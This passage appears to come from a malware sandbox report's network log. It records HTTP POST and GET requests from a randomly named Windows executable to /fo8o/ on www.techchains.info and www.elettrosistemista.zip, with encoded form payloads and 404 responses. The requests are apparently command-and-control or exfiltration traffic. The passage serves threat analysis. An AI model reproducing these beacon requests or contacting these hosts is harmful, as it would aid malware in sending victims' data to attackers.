54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d Data Ascii: Y8F=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
Jun 26, 2024 14:56:56.432214022 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:56:56 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	65236	66.29.149.46	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:56:58.289648056 CEST	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e Data Ascii: Y8F=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
Jun 26, 2024 14:56:58.948954105 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:56:58 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	65237	66.29.149.46	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:00.821873903 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f [TRUNCATED] Data Ascii: Y8F=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx1Z1zVMy9hM/29PYBkWeg640W82hS5bR+73/p1YxFS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp0OcE43JWW7NqLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpqTvXwoZrEGGveh1YUvD1M9uwhS2Djxkp2e8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQpjD2Gsu3STmTn34rqvP3gyE99T1zbRN89ecSSpiwgrnQGzxJxojkTHtDvbDPc2mGlo/980AbVDdw2V4nCfsT9slapAKaq7EEGSeL5i5bH26IQFj/h5ste+eT38btOkmrSX2Uhvlx7+D+TUFcb0rOFOgx6pWk/tKyNXB3rpiYyOR3CiXEqvkhsCKuR2XyVnr3LLe3yV8xHwOTAsZlk9Nr/Hv2Em+zLzYgGBbMENFa0u3f1ylUJeHH8+xGvGM590iI5Uth1I3mxhoJAWDEtppY9LEAiRV+61TFKzUpnM/NRdGOhW5gQEEIRQerBC2R6JTJSEhRMdJ2qTrSzwMCv6VK/n9JXBnu0IG5JtM4G4aYE6Gxt6X1aPY/iCWvNrPXZ4pqgS5iXxHEzdRdodsc9HffbWjYC+3vYu6i5JjkxnT4vfwdN4eDxFbB6sazM4ctju758/LnwlpcqPUKQL9J0uN1KUOJXUXxOtQEXmVLwJAtDjqkYSHfXcx//o/Hx0FG1qN10o4BtUTVzxSFsW [TRUNCATED]
Jun 26, 2024 14:57:01.477955103 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:01 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	65238	66.29.149.46	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:03.350552082 CEST	518	OUT	GET /fo8o/?Y8F=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:57:03.961219072 CEST	652	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:03 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	65239	195.110.124.133	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:09.082429886 CEST	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d Data Ascii: Y8F=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
Jun 26, 2024 14:57:09.753148079 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:09 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	65240	195.110.124.133	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:11.617249966 CEST	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77 Data Ascii: Y8F=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
Jun 26, 2024 14:57:12.306957960 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:57:12 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	65241	195.110.124.133	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:57:14.154470921 CEST	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 [TRUNCATED] Data Ascii: Y8F=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnf